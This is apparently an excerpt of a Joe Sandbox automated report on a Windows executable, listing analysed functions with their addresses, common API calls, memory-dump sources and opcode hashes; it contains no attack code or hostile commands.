                                                                                                                                                                                                                • Instruction ID: b4c9641be177cb763c105fc56b6b2059757f0e7631bd29470974fc083671cfc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6D01212F3D60381E6557B769C4507F15D06F58F36F5006B0C52DC21F1DF3CA0452512
                                                                                                                                                                                                                Function 00007FF67A617F24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 377330604-0
                                                                                                                                                                                                                • Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                                                                                                • Instruction ID: cd0f81349368b3b3138e8f94d42aaf1e59dba12c3568d0d9ef8da0c6a86b27af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D01212F3D60386E6546B75AC8507B15905F48F34F5006F0C12EC01F0DE2CB4853D51
                                                                                                                                                                                                                Function 00007FF67A61B21C Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF67A61B099,?,?,00000000,00007FF67A61B14E), ref: 00007FF67A61B28A
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A61B099,?,?,00000000,00007FF67A61B14E), ref: 00007FF67A61B294
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                • Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                                                                                                                                • Instruction ID: 2cbf9846c6e71eb9fdd4fd8ee44e5ce760dbcf0e032f257d3a94fee71f3c5279
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5221D823B3868201FE919761D45427F1AC29F84FA0F0442B5DE1DC73F5DE6CE849A301
                                                                                                                                                                                                                Function 00007FF67A607D50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • _findclose.LIBCMT ref: 00007FF67A607FA9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2772937645-0
                                                                                                                                                                                                                • Opcode ID: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
                                                                                                                                                                                                                • Instruction ID: f232fe5dff321541fc6cc168724d56b4f146656b0b77c2747a69e9640889365e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C717C53E28AC581EA11CB2CD5452FE7360F7A9B48F54E321DB9C525A2EF28E2D9C740
                                                                                                                                                                                                                Function 00007FF67A61C56C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                                                                                                                                                • Instruction ID: 6907a63089c1a57f6579bca584bc834c2484947ad673c6bfc1b761c8573e0a41
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1341D4B3A2824187EB34DB19E54027E7BA1EB55F45F501171D78EC36A1CF2DE402E791
                                                                                                                                                                                                                Function 00007FF67A6082C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                • Opcode ID: ed5d5332731fbefacaea152c46ccfcc0a6f1b8082d8d222caa24644e45eab1dc
                                                                                                                                                                                                                • Instruction ID: e7055f71363d572c182c776f01d51b2fecb4a9c2d5e06d863d63676f2cc3f444
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed5d5332731fbefacaea152c46ccfcc0a6f1b8082d8d222caa24644e45eab1dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9121F623B3865245FA18DA52A8147BBBA51FF85FD5F881470EE0C87796DE3CE481D304
                                                                                                                                                                                                                Function 00007FF67A61BFFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
                                                                                                                                                                                                                • Instruction ID: 75f7e733d5da2d2f41f9c42e98757bff7228af77e3ff774cc21bd33208106fef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831B023A38A5285F741AF65C84137E6E50AF44F96F4102B5DA2C873F2CF7EE841A721
                                                                                                                                                                                                                Function 00007FF67A619FF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                • Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                                                                                                                                • Instruction ID: 60fcf584ecb45621b10ad9a0662c6aaf83d3fbc70b28311cdbccd42dfaf11e3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A217C32A247868EEB258F64C4402FD3BA0EB14B1DF444676D62D86BE5EF38D584DB50
                                                                                                                                                                                                                Function 00007FF67A6165A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                • Instruction ID: b2dd1ae031c62f92ccfe9d80d055f6450e4b3af0cb59e56d1825273d0bba6c71
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D911636BE2C64181EA60DF51D40127FAA64BF84F88F4444B1EB8DC76AADF7DD440A701
                                                                                                                                                                                                                Function 00007FF67A626DAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                                                                                                                                                • Instruction ID: e71538805a89d622f5934ce624a9b7ce9010b1e2ffc9fab5cb5c77658803dca9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66218E33A28A8687EB61DF18E44077A76A0EB84F54F244234EA5D876E9DF3CD8009B00
                                                                                                                                                                                                                Function 00007FF67A6105FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                • Instruction ID: 15b3bcf7d1b886d29793e9829e9b2f341960c36d216ebda595a0624276dd1099
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA01C422B2874281EA04EB56D90007BAA95BF95FE0F5946B0DE6C97BFACE3CD1019700
                                                                                                                                                                                                                Function 00007FF67A6083F0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 377330604-0
                                                                                                                                                                                                                • Opcode ID: e6a02a7f238b553af44caf36d8d3da4ad3d885b6836fbbaa7e86c6893428cba3
                                                                                                                                                                                                                • Instruction ID: da9590d144b111c2306e53b865544c313b1f0319e448ee3320b838c968fd5451
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6a02a7f238b553af44caf36d8d3da4ad3d885b6836fbbaa7e86c6893428cba3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65418317D3CB8581EA51DB2495112FE7360FBA5F45F44A672DB8D822A3EF28E5D89300
                                                                                                                                                                                                                Function 00007FF67A61F258 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF67A61BAA6,?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02), ref: 00007FF67A61F2AD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                                                                                                                                • Instruction ID: 8c07660080a5d9ded87c1ce05a04fc7a6bc3bb31a64496db0d75262d361982b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0906BB2960741FE549BE1D4113BB5A815F4CF40F4C88B2CE0EC63F1EE2CE480A610
                                                                                                                                                                                                                Function 00007FF67A61DCBC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF67A610E24,?,?,?,00007FF67A612336,?,?,?,?,?,00007FF67A613929), ref: 00007FF67A61DCFA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                                                                                                                                • Instruction ID: 37c3e9452d541cf1466af05274cc83f7e30ba0e598c346a257f36e8d6cc92176
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFF08203F2A24791FE545762D8012771A949F88FA0F080AB0DE2ECA2E1DE2CE440A610

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 00007FF67A6051F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc
